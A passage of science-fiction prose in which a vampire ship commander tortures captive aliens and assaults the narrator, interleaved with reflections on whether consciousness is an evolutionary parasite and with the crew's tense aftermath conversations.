+By now the scramblers would have seemed sick and ragged even to a virgin audience. They floated near the middle of their respective compartments, segmented arms drifting aimlessly back and forth. Membranous patches of—skin, I suppose—were peeling from the cuticles, giving them a fuzzy, decomposing aspect.
+"The arms move continuously," Sarasti remarked. "Robert says it assists in circulation."
+I nodded, watching the display.
+"Creatures that move between stars can't even perform basic metabolic functions without constant flailing." He shook his head. "Inefficient. Primitive."
+I glanced at the vampire. He remained fixed on our captives.
+"Obscene," he said, and moved his fingers.
+A new window opened on the wall: the Rosetta protocol, initializing. Kilometers away, microwaves flooded the holding tanks.
+I reminded myself: No interference. Only observation.
+However weakened their condition, the scramblers were not yet indifferent to pain. They knew the game, they knew the rules; they dragged themselves to their respective panels and played for mercy. Sarasti had simply invoked a step-by-step replay of some previous sequence. The scramblers went through it all again, buying a few moments' intermittent respite with the same old proofs and theorems.
+Sarasti clicked, then spoke: "They regenerate these solutions faster than they did before. Do you think they're acclimated to the microwaves?"
+Another readout appeared on the display; an audio alarm began chirping somewhere nearby. I looked at Sarasti, and back at the readout: a solid circle of turquoise backlit by a pulsing red halo. The shape meant atmospheric anomaly. The color meant oxygen.
+I felt a moment of confusion—(Oxygen? Why would oxygen set off the alarm?)—until I remembered: Scramblers were anaerobes.
+Sarasti muted the alarm with a wave of his hand.
+I cleared my throat: "You're poisoning—"
+"Watch. Performance is consistent. No change."
+I swallowed. Just observe.
+"Is this an execution?" I asked. "Is this a, a mercy killing?"
+Sarasti looked past me, and smiled. "No."
+I dropped my eyes. "What, then?"
+He pointed at the display. I turned, reflexively obedient.
+Something stabbed my hand like a spike at a crucifixion.
+I screamed. Electric pain jolted to my shoulder. I yanked my hand back without thinking; the embedded blade split its flesh like a fin through water. Blood sprayed into the air and stayed there, a comet's tail of droplets tracing the frenzied arc of my hand.
+Sudden scalding heat from behind. Flesh charred on my back. I screamed again, flailing. A veil of bloody droplets swirled in the air.
+Somehow I was in the corridor, staring dumbly at my right hand. It had been split to the heel of the palm, flopped at the end of my wrist in two bloody, bifingered chunks. Blood welled from the torn edges and wouldn't fall. Sarasti advanced through a haze of trauma and confusion. His face swam in and out of focus, rich with his blood or mine. His eyes were bright red mirrors, his eyes were time machines. Darkness roared around them and it was half a million years ago and I was just another piece of meat on the African savannah, a split-second from having its throat torn out.
+"Do you see the problem?" Sarasti asked, advancing. A great spider crab hovered at his shoulder. I forced focus through the pain: one of Bates' grunts, taking aim. I kicked blindly, hit the ladder through sheer happenstance, careened backwards down the corridor.
+The vampire came after me, his face split into something that would have been a smile on anyone else. "Conscious of pain, you're distracted by pain. You're fixated on it. Obsessed by the one threat, you miss the other."
+I flailed. Crimson mist stung my eyes.
+"So much more aware, so much less perceptive. An automaton could do better."
+He's snapped, I thought. He's insane. And then No, he's a transient. He's always been a transient—
+"They could do better," he said softly.
+—and he's been hiding for days. Deep down. Hiding from the seals.
+What else would he do?
+Sarasti raised his hands, fading in and out of focus. I hit something, kicked without aiming, bounced away through swirling mist and startled voices. Metal cracked the back of my head and spun me around.
+A hole, a burrow. A place to hide. I dove through, my torn hand flapping like a dead fish against the edge of the hatch. I cried out and tumbled into the drum, the monster at my heels.
+Startled shouts, very close now. "This wasn't the plan, Jukka! This wasn't the goddamned plan!" That was Susan James, full of outrage, while Amanda Bates snarled "Stand down, right fucking now!" and leapt from the deck to do battle. She rose through the air, all overclocked reflexes and carboplatinum augments but Sarasti just batted her aside and kept on coming. His arm shot out like a striking snake. His hand clamped around my throat.
+"Is this what you meant?" James cried from some dark irrelevant hiding place. "Is this your preconditioning?"
+Sarasti shook me. "Are you in there, Keeton?"
+My blood splattered across his face like rain. I babbled and cried.
+"Are you listening? Can you see?"
+And suddenly I could. Suddenly everything clicked into focus. Sarasti wasn't talking at all. Sarasti didn't even exist anymore. Nobody did. I was alone in a great spinning wheel surrounded by things that were made out of meat, things that moved all by themselves. Some of them were wrapped in pieces of cloth. Strange nonsensical sounds came from holes at their top ends, and there were other things up there, bumps and ridges and something like marbles or black buttons, wet and shiny and embedded in the slabs of meat. They glistened and jiggled and moved as if trying to escape.
+I didn't understand the sounds the meat was making, but I heard a voice from somewhere. It was like God talking, and that I couldn't help but understand.
+"Get out of your room, Keeton," it hissed. "Stop transposing or interpolating or rotating or whatever it is you do. Just listen. For once in your goddamned life, understand something. Understand that your life depends on it. Are you listening, Keeton?"
+And I cannot tell you what it said. I can only tell you what I heard.
+
+*
+
+You invest so much in it, don't you? It's what elevates you above the beasts of the field, it's what makes you special. Homo sapiens, you call yourself. Wise Man. Do you even know what it is, this consciousness you cite in your own exaltation? Do you even know what it's for?
+Maybe you think it gives you free will. Maybe you've forgotten that sleepwalkers converse, drive vehicles, commit crimes and clean up afterwards, unconscious the whole time. Maybe nobody's told you that even waking souls are only slaves in denial.
+Make a conscious choice. Decide to move your index finger. Too late! The electricity's already halfway down your arm. Your body began to act a full half-second before your conscious self 'chose' to, for the self chose nothing; something else set your body in motion, sent an executive summary—almost an afterthought— to the homunculus behind your eyes. That little man, that arrogant subroutine that thinks of itself as the person, mistakes correlation for causality: it reads the summary and it sees the hand move, and it thinks that one drove the other.
+But it's not in charge. You're not in charge. If free will even exists, it doesn't share living space with the likes of you.
+Insight, then. Wisdom. The quest for knowledge, the derivation of theorems, science and technology and all those exclusively human pursuits that must surely rest on a conscious foundation. Maybe that's what sentience would be for— if scientific breakthroughs didn't spring fully-formed from the subconscious mind, manifest themselves in dreams, as full-blown insights after a deep night's sleep. It's the most basic rule of the stymied researcher: stop thinking about the problem. Do something else. It will come to you if you just stop being conscious of it.
+Every concert pianist knows that the surest way to ruin a performance is to be aware of what the fingers are doing. Every dancer and acrobat knows enough to let the mind go, let the body run itself. Every driver of any manual vehicle arrives at destinations with no recollection of the stops and turns and roads traveled in getting there. You are all sleepwalkers, whether climbing creative peaks or slogging through some mundane routine for the thousandth time. You are all sleepwalkers.
+Don't even try to talk about the learning curve. Don't bother citing the months of deliberate practice that precede the unconscious performance, or the years of study and experiment leading up to the gift-wrapped Eureka moment. So what if your lessons are all learned consciously? Do you think that proves there's no other way? Heuristic software's been learning from experience for over a hundred years. Machines master chess, cars learn to drive themselves, statistical programs face problems and design the experiments to solve them and you think that the only path to learning leads through sentience? You're Stone-age nomads, eking out some marginal existence on the veldt—denying even the possibility of agriculture, because hunting and gathering was good enough for your parents.
+Do you want to know what consciousness is for? Do you want to know the only real purpose it serves? Training wheels. You can't see both aspects of the Necker Cube at once, so it lets you focus on one and dismiss the other. That's a pretty half-assed way to parse reality. You're always better off looking at more than one side of anything. Go on, try. Defocus. It's the next logical step.
+Oh, but you can't. There's something in the way.
+And it's fighting back.
+
+*
+
+Evolution has no foresight. Complex machinery develops its own agendas. Brains—cheat. Feedback loops evolve to promote stable heartbeats and then stumble upon the temptation of rhythm and music. The rush evoked by fractal imagery, the algorithms used for habitat selection, metastasize into art. Thrills that once had to be earned in increments of fitness can now be had from pointless introspection. Aesthetics rise unbidden from a trillion dopamine receptors, and the system moves beyond modeling the organism. It begins to model the very process of modeling. It consumes ever-more computational resources, bogs itself down with endless recursion and irrelevant simulations. Like the parasitic DNA that accretes in every natural genome, it persists and proliferates and produces nothing but itself. Metaprocesses bloom like cancer, and awaken, and call themselves I.
+
+*
+
+The system weakens, slows. It takes so much longer now to perceive—to assess the input, mull it over, decide in the manner of cognitive beings. But when the flash flood crosses your path, when the lion leaps at you from the grasses, advanced self-awareness is an unaffordable indulgence. The brain stem does its best. It sees the danger, hijacks the body, reacts a hundred times faster than that fat old man sitting in the CEO's office upstairs; but every generation it gets harder to work around this— this creaking neurological bureaucracy.
+I wastes energy and processing power, self-obsesses to the point of psychosis. Scramblers have no need of it, scramblers are more parsimonious. With simpler biochemistries, with smaller brains—deprived of tools, of their ship, even of parts of their own metabolism—they think rings around you. They hide their language in plain sight, even when you know what they're saying. They turn your own cognition against itself. They travel between the stars. This is what intelligence can do, unhampered by self-awareness.
+I is not the working mind, you see. For Amanda Bates to say "I do not exist" would be nonsense; but when the processes beneath say the same thing, they are merely reporting that the parasites have died. They are only saying that they are free.
+If the human brain were so simple that we could understand it,
+we would be so simple that we couldn't."
+—Emerson M. Pugh
+
+Sarasti, you bloodsucker.
+My knees pressed against my forehead. I hugged my folded legs as though clinging to a branch over a chasm.
+You vicious asshole. You foul sadistic monster.
+My breath rasped loud and mechanical. It nearly drowned out the blood roaring in my ears.
+You tore me apart, you made me piss and shit myself and I cried like some gutted baby and you stripped me naked, you fucking thing, you night crawler, you broke my tools, you took away anything I ever had that let me touch anyone and you didn't have to you babyfucker, it wasn't necessary but you knew that didn't you? You just wanted to play. I've seen your kind at it before, cats toying with mice, catch and release, a taste of freedom and then pouncing again, biting, not hard enough to kill— not just yet—before you let them loose again and they're hobbling now, maybe a leg snapped or a gash in the belly but they're still trying, still running or crawling or dragging themselves as fast as they can until you're on them again, and again because it's fun, because it gives you pleasure you sadistic piece of shit. You send us into the arms of that hellish thing and it plays with us too, and maybe you're even working together because it let me escape just like you do, it let me run right back into your arms and then you strip me down to some raw half-brained defenseless animal, I can't rotate or transform I can't even talk and you—
+You—
+It wasn't even personal, was it? You don't even hate me. You were just sick of keeping it all in, sick of restraining yourself with all this meat, and nobody else could be spared from their jobs. This was my job, wasn't it? Not synthesist, not conduit. Not even cannon fodder or decoy duty. I'm just something disposable to sharpen your claws on.
+I hurt so much. It hurt just to breathe.
+I was so alone.
+Webbing pressed against the curve of my back, bounced me forward gently as a breeze, caught me again. I was back in my tent. My right hand itched. I tried to flex the fingers, but they were embedded in amber. Left hand reached for right, and found a plastic carapace extending to the elbow.
+I opened my eyes. Darkness. Meaningless numbers and a red LED twinkled from somewhere along my forearm.
+I didn't remember coming here. I didn't remember anyone fixing me.
+Breaking. Being broken. That's what I remembered. I wanted to die. I wanted to just stay curled up until I withered away.
+After an age, I forced myself to uncoil. I steadied myself, let some miniscule inertia bump me against the taut insulated fabric of my tent. I waited for my breathing to steady. It seemed to take hours.
+I called ConSensus to the wall, and a feed from the drum. Soft voices, harsh light flaring against the wall: hurting my eyes, peeling them raw. I killed visual, and listened to words in the darkness.
+"—a phase?" someone asked.
+Susan James, her personhood restored. I knew her again: not a meat sack, no longer a thing.
+"We have been over this." That was Cunningham. I knew him too. I knew them all. Whatever Sarasti had done to me, however far he'd yanked me from my room, I'd somehow fallen back inside.
+It should have mattered more.
+"—because for one thing, if it were really so pernicious, natural selection would have weeded it out," James was saying.
+"You have a naïve understanding of evolutionary processes. There's no such thing as survival of the fittest. Survival of the most adequate, maybe. It doesn't matter whether a solution's optimal. All that matters is whether it beats the alternatives."
+I knew that voice too. It belonged to a demon.
+"Well, we damn well beat the alternatives." Some subtle overdubbed harmonic in James' voice suggested a chorus: the whole Gang, rising as one in opposition.
+I couldn't believe it. I'd just been mutilated, beaten before their eyes—and they were talking about biology?
+Maybe she's afraid to talk about anything else, I thought. Maybe she's afraid she might be next.
+Or maybe she just couldn't care less what happens to me.
+"It's true," Sarasti told her, "that your intellect makes up for your self-awareness to some extent. But you're flightless birds on a remote island. You're not so much successful as isolated from any real competition."
+No more clipped speech patterns. No more terse phrasing. The transient had made his kill, found his release. Now he didn't care who knew he was around.
+"You?" Michelle whispered. "Not we?"
+"We stop racing long ago," the demon said at last. "It's not our fault you don't leave it at that."
+"Ah." Cunningham again. "Welcome back. Did you look in on Ke—"
+"No." Bates said.
+"Satisfied?" the demon asked.
+"If you mean the grunts, I'm satisfied you're out of them," Bates said. "If you mean— it was completely unwarranted, Jukka."
+"It isn't."
+"You assaulted a crewmember. If we had a brig you'd be in it for the rest of the trip."
+"This isn't a military vessel, Major. You're not in charge."
+I didn't need a visual feed to know what Bates thought of that. But there was something else in her silence, something that made me bring the drum camera back online. I squinted against the corrosive light, brought down the brightness until all that remained was a faint whisper of pastels.
+Yes. Bates. Stepping off the stairway onto the deck
+"Grab a chair," Cunningham said from his seat in the Commons. "It's golden oldies time."
+There was something about her.
+"I'm sick of that song," Bates said. "We've played it to death."
+Even now, my tools chipped and battered, my perceptions barely more than baseline, I could see the change. This torture of prisoners, this assault upon crew, had crossed a line in her head. The others wouldn't see it. The lid on her affect was tight as a boilerplate. But even through the dim shadows of my window the topology glowed around her like neon.
+Amanda Bates was no longer merely considering a change of command. Now it was only a matter of when.
+
+*
+
+The universe was closed and concentric.
+My tiny refuge lay in its center. Outside that shell was another, ruled by a monster, patrolled by his lackeys. Beyond that was another still, containing something even more monstrous and incomprehensible, something that might soon devour us all.
+There was nothing else. Earth was a vague hypothesis, irrelevant to this pocket cosmos. I saw no place into which it might fit.
+I stayed in the center of the universe for a long time, hiding. I kept the lights off. I didn't eat. I crept from my tent only to piss or shit in the cramped head down at Fab, and only when the spine was deserted. A field of painful blisters rose across my flash-burned back, as densely packed as kernels on a corncob. The slightest abrasion tore them open.
+Nobody tapped at my door, nobody called my name through ConSensus. I wouldn't have answered if they had. Maybe they knew that, somehow. Maybe they kept their distance out of respect for my privacy and my disgrace.
+Maybe they just didn't give a shit.
+I peeked outside now and then, kept an eye on Tactical. I saw Scylla and Charybdis climb into the accretion belt and return towing captured reaction mass in a great distended mesh between them. I watched our ampsat reach its destination in the middle of nowhere, saw antimatter's quantum blueprints stream down into Theseus's buffers. Mass and specs combined in Fab, topped up our reserves, forged the tools that Jukka Sarasti needed for his master plan, whatever that was.
+Maybe he'd lose. Maybe Rorschach would kill us all, but not before it had played with Sarasti the way Sarasti had played with me. That would almost make it worthwhile. Or maybe Bates' mutiny would come first, and succeed. Maybe she would slay the monster, and commandeer the ship, and take us all to safety.
+But then I remembered: the universe was closed, and so very small. There was really nowhere else to go.
+I put my ear to feeds throughout the ship. I heard routine instructions from the predator, murmured conversations among the prey. I took in only sound, never sight; a video feed would have spilled light into my tent, left me naked and exposed. So I listened in the darkness as the others spoke among themselves. It didn't happen often any more. Perhaps too much had been said already, perhaps there was nothing left to do but mind the countdown. Sometimes hours would pass with no more than a cough or a grunt.
+When they did speak, they never mentioned my name. Only once did I hear any of them even hint at my existence.
+That was Cunningham, talking to Sascha about zombies. I heard them in the galley over breakfast, unusually talkative. Sascha hadn't been let out for a while, and was making up for lost time. Cunningham let her, for reasons of his own. Maybe his fears had been soothed somehow, maybe Sarasti had revealed his master plan. Or maybe Cunningham simply craved distraction from the imminence of the enemy.
+"It doesn't bug you?" Sascha was saying. "Thinking that your mind, the very thing that makes you you, is nothing but some kind of parasite?"
+"Forget about minds," he told her. "Say you've got a device designed to monitor—oh, cosmic rays, say. What happens when you turn its sensor around so it's not pointing at the sky anymore, but at its own guts?" He answered himself before she could: "It does what it's built to. It measures cosmic rays, even though it's not looking at them any more. It parses its own circuitry in terms of cosmic-ray metaphors, because those feel right, because they feel natural, because it can't look at things any other way. But it's the wrong metaphor. So the system misunderstands everything about itself. Maybe that's not a grand and glorious evolutionary leap after all. Maybe it's just a design flaw."
+"But you're the biologist. You know Mom was right better'n anyone. Brain's a big glucose hog. Everything it does costs through the nose."
+"True enough," Cunningham admitted.
+"So sentience has gotta be good for something, then. Because it's expensive, and if it sucks up energy without doing anything useful then evolution's gonna weed it out just like that."
+"Maybe it did." He paused long enough to chew food or suck smoke. "Chimpanzees are smarter than Orangutans, did you know that? Higher encephalisation quotient. Yet they can't always recognize themselves in a mirror. Orangs can."
+"So what's your point? Smarter animal, less self-awareness? Chimpanzees are becoming nonsentient?"
+"Or they were, before we stopped everything in its tracks."
+"So why didn't that happen to us?"
+"What makes you think it didn't?"
+It was such an obviously stupid question that Sascha didn't have an answer for it. I could imagine her gaping in the silence.
+"You're not thinking this through," Cunningham said. "We're not talking about some kind of zombie lurching around with its arms stretched out, spouting mathematical theorems. A smart automaton would blend in. It would observe those around it, mimic their behavior, act just like everyone else. All the while completely unaware of what it was doing. Unaware even of its own existence."
+"Why would it bother? What would motivate it?"
+"As long as you pull your hand away from an open flame, who cares whether you do it because it hurts or because some feedback algorithm says withdraw if heat flux exceeds critical T? Natural selection doesn't care about motives. If impersonating something increases fitness, then nature will select good impersonators over bad ones. Keep it up long enough and no conscious being would be able to pick your zombie out of a crowd." Another silence; I could hear him chewing through it. "It'll even be able to participate in a conversation like this one. It could write letters home, impersonate real human feelings, without having the slightest awareness of its own existence."
+"I dunno, Rob. It just seems—"
+"Oh, it might not be perfect. It might be a bit redundant, or resort to the occasional expository infodump. But even real people do that, don't they?"
+"And eventually, there aren't any real people left. Just robots pretending to give a shit."
+"Perhaps. Depends on the population dynamics, among other things. But I'd guess that at least one thing an automaton lacks is empathy; if you can't feel, you can't really relate to something that does, even if you act as though you do. Which makes it interesting to note how many sociopaths show up in the world's upper echelons, hmm? How ruthlessness and bottom-line self-interest are so lauded up in the stratosphere, while anyone showing those traits at ground level gets carted off into detention with the Realists. Almost as if society itself is being reshaped from the inside out."
+"Oh, come on. Society was always pretty— wait, you're saying the world's corporate elite are nonsentient?"
+"God, no. Not nearly. Maybe they're just starting down that road. Like chimpanzees."
+"Yeah, but sociopaths don't blend in well."
+"Maybe the ones that get diagnosed don't, but by definition they're the bottom of the class. The others are too smart to get caught, and real automatons would do even better. Besides, when you get powerful enough, you don't need to act like other people. Other people start acting like you."
+Sascha whistled. "Wow. Perfect play-actor."
+"Or not so perfect. Sound like anyone we know?"
+They may have been talking about someone else entirely, I suppose. But that was as close to a direct reference to Siri Keeton that I heard in all my hours on the grapevine. Nobody else mentioned me, even in passing. That was statistically unlikely, given what I'd just endured in front of them all; someone should have said something. Perhaps Sarasti had ordered them not to discuss it. I didn't know why. But it was obvious by now that the vampire had been orchestrating their interactions with me for some time. Now I was in hiding, but he knew I'd listen in at some point. Maybe, for some reason, he didn't want my surveillance—contaminated…
+He could have simply locked me out of ConSensus. He hadn't. Which meant he still wanted me in the loop.
+Zombies. Automatons. Fucking sentience.
+For once in your goddamned life, understand something.
+He'd said that to me. Or something had. During the assault.
+Understand that your life depends on it.
+Almost as if he were doing me a favor.
+Then he'd left me alone. And had evidently told the others to do the same.
+Are you listening, Keeton?
+And he hadn't locked me out of ConSensus.
+
+*
+
+Centuries of navel-gazing. Millennia of masturbation. Plato to Descartes to Dawkins to Rhanda. Souls and zombie agents and qualia. Kolmogorov complexity. Consciousness as Divine Spark. Consciousness as electromagnetic field. Consciousness as functional cluster.
+I explored it all.
+Wegner thought it was an executive summary. Penrose heard it in the singing of caged electrons. Nirretranders said it was a fraud; Kazim called it leakage from a parallel universe. Metzinger wouldn't even admit it existed. The AIs claimed to have worked it out, then announced they couldn't explain it to us. Gödel was right after all: no system can fully understand itself.
+Not even the synthesists had been able to rotate it down. The load-bearing beams just couldn't take the strain.
+All of them, I began to realize, had missed the point. All those theories, all those drugdreams and experiments and models trying to prove what consciousness was: none to explain what it was good for. None needed: obviously, consciousness makes us what we are. It lets us see the beauty and the ugliness. It elevates us into the exalted realm of the spiritual. Oh, a few outsiders—Dawkins, Keogh, the occasional writer of hackwork fiction who barely achieved obscurity—wondered briefly at the why of it: why not soft computers, and no more? Why should nonsentient systems be inherently inferior? But they never really raised their voices above the crowd. The value of what we are was too trivially self-evident to ever call into serious question.
+Yet the questions persisted, in the minds of the laureates, in the angst of every horny fifteen-year-old on the planet. Am I nothing but sparking chemistry? Am I a magnet in the ether? I am more than my eyes, my ears, my tongue; I am the little thing behind those things, the thing looking out from inside. But who looks out from its eyes? What does it reduce to? Who am I? Who am I? Who am I?
+What a stupid fucking question. I could have answered it in a second, if Sarasti hadn't forced me to understand it first.
+"Not until we are lost do we begin to understand ourselves."
+—Thoreau
+
+The shame had scoured me and left me hollow. I didn't care who saw me. I didn't care what state they saw me in. For days I'd floated in my tent, curled into a ball and breathing my own stink while the others made whatever preparations my tormentor had laid out for them. Amanda Bates was the only one who'd raised even a token protest over what Sarasti had done to me. The others kept their eyes down and their mouths shut and did what he told them to— whether from fear or indifference I couldn't tell.
+It was something else I'd stopped caring about.
+Sometime during that span the cast on my arm cracked open like a shucked clam. I upped the lumens long enough to assess its handiwork; my repaired palm itched and glistened in twilight, a longer, deeper Fate line running from heel to web. Then back to darkness, and the blind unconvincing illusion of safety.
+Sarasti wanted me to believe. Somehow he must have thought that brutalising and humiliating me would accomplish that—that broken and drained, I would become an empty vessel to fill as he saw fit. Wasn't it a classic brainwashing technique—to shatter your victim and then glue the pieces back together in according to specs of your own choosing? Maybe he was expecting some kind of Stockholm Syndrome to set in, or maybe his actions followed some agenda incomprehensible to mere meat.
+Maybe he'd simply gone insane.
+He had broken me. He had presented his arguments. I had followed his trail of bread crumbs through ConSensus, through Theseus. And now, only nine days from graduation, I knew one thing for sure: Sarasti was wrong. He had to be. I couldn't see how, but I knew it just the same. He was wrong.
+Somehow, absurdly, that had become the one thing I did care about.
+
+*
+
+No one in the spine. Only Cunningham visible in BioMed, poring over digital dissections, pretending to kill time. I floated above him, my rebuilt hand clinging to the top of the nearest stairwell; it dragged me in a slow, small circle as the Drum turned. Even from up there I could see the tension in the set of his shoulders: a system stuck in a holding pattern, corroding through the long hours as fate advanced with all the time in the world.
+He looked up. "Ah. It lives."
+I fought the urge to retreat. Just a conversation, for God's sake. It's just two people talking. People do it all the time without your tools. You can do this. You can do this.
+Just try.
+So I forced one foot after another down the stairs, weight and apprehension rising in lockstep. I tried to read Cunningham's topology through the haze. Maybe I saw a facade, only microns deep. Maybe he would welcome almost any distraction, even if he wouldn't admit it.
+Or maybe I was just imagining it.
+"How are you doing?" he asked as I reached the deck.
+I shrugged.
+"Hand all better, I see."
+"No thanks to you."
+I'd tried to stop that from coming out. Really.
+Cunningham struck a cigarette. "Actually, I was the one who fixed you up."
+"You also sat there and watched while he took me apart."
+"I wasn't even there." And then, after a moment: "But you may be right. I might very well have sat it out in any event. Amanda and the Gang did try to intervene on your behalf, from what I hear. Didn't do a lot of good for anyone."
+"So you wouldn't even try."
+"Would you, if the sitution were reversed? Go up unarmed against a vampire?"
+I said nothing. Cunningham regarded me for a long moment, dragging on his cigarette. "He really got to you, didn't he?" he said at last.
+"You're wrong," I said.
+"Am I."
+"I don't play people."
+"Mmmm." He seemed to consider the proposition. "What word would you prefer, then?"
+"I observe."
+"That you do. Some might even call it surveillance."
+"I—I read body language." Hoping that that was all he was talking about.
+"It's a matter of degree and you know it. Even in a crowd there's a certain expectation of privacy. People aren't prepared to have their minds read off every twitch of the eyeball." He stabbed at the air with his cigarette. "And you. You're a shapeshifter. You present a different face to every one of us, and I'll wager none of them is real. The real you, if it even exists, is invisible..."
+Something knotted below my diaphragm. "Who isn't? Who doesn't—try to fit in, who doesn't want to get along? There's nothing malicious about that. I'm a synthesist, for God's sake! I never manipulate the variables."
+"Well you see, that's the problem. It's not just variables you're manipulating."
+Smoke writhed between us.
+"But I guess you can't really understand that, can you." He stood and waved a hand. ConSensus windows imploded at his side. "Not your fault, really. You can't blame someone for the way they're wired."
+"Give me a fucking break," I snarled.
+His dead face showed nothing.
+That, too, had slipped out before I could stop it—and after that came the flood: "You put so much fucking stock in that. You and your empathy. And maybe I am just some kind of imposter but most people would swear I'd worn their very souls. I don't need that shit, you don't have to feel motives to deduce them, it's better if you can't, it keeps you—"
+"Dispassionate?" Cunningham smiled faintly.
+"Maybe your empathy's just a comforting lie, you ever think of that? Maybe you think you know how the other person feels but you're only feeling yourself, maybe you're even worse than me. Or maybe we're all just guessing. Maybe the only difference is that I don't lie to myself about it."
+"Do they look the way you imagined?" he asked.
+"What? What are you talking about?"
+"The scramblers. Multijointed arms from a central mass. Sounds rather similar to me."
+He'd been into Szpindel's archives.
+"I—Not really," I said. "The arms are more—flexible, in real life. More segmented. And I never really got a look at the body. What does that have to do with—"
+"Close, though, wasn't it? Same size, same general body plan."
+"So what?"
+"Why didn't you report it?"
+"I did. Isaac said it was just TMS. From Rorschach."
+"You saw them before Rorschach. Or at least," he continued, "you saw something that scared you into blowing your cover, back when you were spying on Isaac and Michelle."
+My rage dissipated like air through a breach. "They—they knew?"
+"Only Isaac, I think. And it kept it between it and the logs. I suspect it didn't want to interfere with your noninterference protocols—although I'll wager that was the last time you ever caught the two of them in private, yes?"
+I didn't say anything.
+"Did you think the official observer was somehow exempt from observation?" Cunningham asked after a while.
+"No," I said softly. "I suppose not."
+He nodded. "Have you seen any since? I'm not talking about run-of-the-mill TMS hallucinations. I mean scramblers. Have you hallucinated any since you actually saw one in the flesh, since you knew what they looked like?"
+I thought about it. "No."
+He shook his head, some new opinion confirmed. "You really are something, Keeton, you know that? You don't lie to yourself? Even now, you don't know what you know."
+"What are you talking about?"
+"You figured it out. From Rorschach's architecture, probably—form follows function, yes? Somehow you pieced together a fairly good idea of what a scrambler looked like before anyone ever laid eyes on them. Or at least—" He drew a breath; his cigarette flared like an LED— "part of you did. Some collection of unconscious modules working their asses off on your behalf. But they can't show their work, can they? You don't have conscious access to those levels. So one part of the brain tries to tell another any way it can. Passes notes under the table."
+"Blindsight," I murmered. You just get a feeling of where to reach...
+"More like schizophrenia, except you saw pictures instead of hearing voices. You saw pictures. And you still didn't understand."
+I blinked. "But how would I—I mean—"
+"What did you think, that Theseus was haunted? That the scramblers were communing with you telepathically? What you do—it matters, Keeton. They told you you were nothing but their stenographer and they hammered all those layers of hands-off passivity into you but you just had to take some initiative anyway, didn't you? Had to work the problem on your own. The only thing you couldn't do was admit it to yourself." Cunningham shook his head. "Siri Keeton. See what they've done to you."
+He touched his face.
+"See what they've done to us all," he whispered.
+
+*
+
+I found the Gang floating in the center of the darkened observation blister. She made room as I joined her, pushed to one side and anchored herself to a bit of webbing.
+"Susan?" I asked. I honestly couldn't tell any more.
+"I'll get her," Michelle said.
+"No, that's all right. I'd like to speak to all of—"
+But Michelle had already fled. The half-lit figure changed before me, and said, "She'd rather be alone right now."
+I nodded. "You?"
+James shrugged. "I don't mind talking. Although I'm surprised you're still doing your reports, after...."
+"I'm—not, exactly. This isn't for Earth."
+I looked around. Not much to see. Faraday mesh coated the inside of the dome like a gray film, dimming and graining the view beyond. Ben hung like a black malignancy across half the sky. I could make out a dozen dim contrails against vague bands of cloud, in reds so deep they bordered on black. The sun winked past James's shoulder, our sun, a bright dot that diffracted into faint splintered rainbows when I moved my head. That was pretty much it: starlight didn't penetrate the mesh, nor did the larger, dimmer particles of the accretion belt. The myriad dim pinpoints of shovelnosed machinery were lost utterly.
+Which might be a comfort to some, I supposed.
+"Shitty view," I remarked. Theseus could have projected crisp first-person vistas across the dome in an instant, more real than real.
+"Michelle likes it," James said. "The way it feels. And Cruncher likes the diffraction effects, he likes— interference patterns."
+We watched nothing for a while, by the dim half-light filtering out from the spine. It brushed the edges of James' profile.
+"You set me up," I said at last.
+She looked at me. "What do you mean?"
+"You were talking around me all along, weren't you? All of you. You didn't bring me in until I'd been—" How had she put it? "—preconditioned. The whole thing was planned to throw me off-balance. And then Sarasti— attacks me out of nowhere, and—"
+"We didn't know about that. Not until the alarm went off."
+"Alarm?"
+"When he changed the gas mix. You must have heard it. Isn't that why you were there?"
+"He called me to his tent. He told me to watch."
+She regarded me from a face full of shadow. "You didn't try to stop him?"
+I couldn't answer the accusation in her voice. "I just—observe," I said weakly.
+"I thought you were trying to stop him from—" She shook her head. "That's why I thought he was attacking you."
+"You're saying that wasn't an act? You weren't in on it?" I didn't believe it.
+But I could tell she did.
+"I thought you were trying to protect them." She snorted a soft, humorless laugh at her own mistake and looked away. "I guess I should have known better."
+She should have. She should have known that taking orders is one thing; taking sides would have done nothing but compromise my integrity.
+And I should have been used to it by now.
+I forged on. "It was some kind of object lesson. A, a tutorial. You can't torture the nonsentient or something, and — and I heard you, Susan. It wasn't news to you, it wasn't news to anyone except me, and..."
+And you hid it from me. You all did. You and your whole gang and Amanda too. You've been hashing this out for days and you went out of your way to cover it up.
+How did I miss it? How did I miss it?
+"Jukka told us not to discuss it with you," Susan admitted.
+"Why? This is exactly the kind of thing I'm out here for!"
+"He said you'd—resist. Unless it was handled properly."
+"Handled—Susan, he assaulted me! You saw what he—"
+"We didn't know he was going to do that. None of us did."
+"And he did it why? To win an argument?"
+"That's what he says."
+"Do you believe him?"
+"Probably." After a moment she shrugged. "Who knows? He's a vampire. He's—opaque."
+"But his record—I mean, he's, he's never resorted to overt violence before—"
+She shook her head. "Why should he? He doesn't have to convince the rest of us of anything. We have to follow his orders regardless."
+"So do I," I reminded her.
+"He's not trying to convince you, Siri."
+Ah.
+I was only a conduit, after all. Sarasti hadn't been making his case to me at all; he'd been making it through me, and—
+—and he was planning for a second round. Why go to such extremes to present a case to Earth, if Earth was irrelevant? Sarasti didn't expect the game to end out here. He expected Earth to do something in light of his—perspective.
+"But what difference does it make?" I wondered aloud.
+She just looked at me.
+"Even if he's right, how does it change anything? How does this—" I raised my repaired hand—"change anything? Scramblers are intelligent, whether they're sentient or not. They're a potential threat either way. We still don't know. So what difference does it make? Why did he do this to me? How does it matter?"
+Susan raised her face to Big Ben and didn't answer.
+Sascha returned her face to me, and tried to.
+"It matters," she said, "because it means we attacked them before Theseus launched. Before Firefall, even."
+"We attacked the—"
+"You don't get it, do you? You don't." Sascha snorted softly. "If that isn't the fucking funniest thing I've heard in my whole short life."
+She leaned forward, bright-eyed. "Imagine you're a scrambler, and you encounter a human signal for the very first time."
+Her stare was almost predatory. I resisted the urge to back away.
+"It should be so easy for you, Keeton. It should be the easiest gig you've ever had. Aren't you the user interface, aren't you the Chinese Room? Aren't you the one who never has to look inside, never has to walk a mile in anyone's shoes, because you figure everyone out from their surfaces?"
+She stared at Ben's dark smoldering disk. "Well, there's your dream date. There's a whole race of nothing but surfaces. There's no inside to figure out. All the rules are right up front. So go to work, Siri Keeton. Make us proud."
+There was no contempt in Sascha's voice, no disdain. There wasn't even anger, not in her voice, not in her eyes.
+There was pleading. There were tears.
+"Imagine you're a scrambler," she whispered again, as they floated like tiny perfect beads before her face.
+
+*
+
+Imagine you're a scrambler.
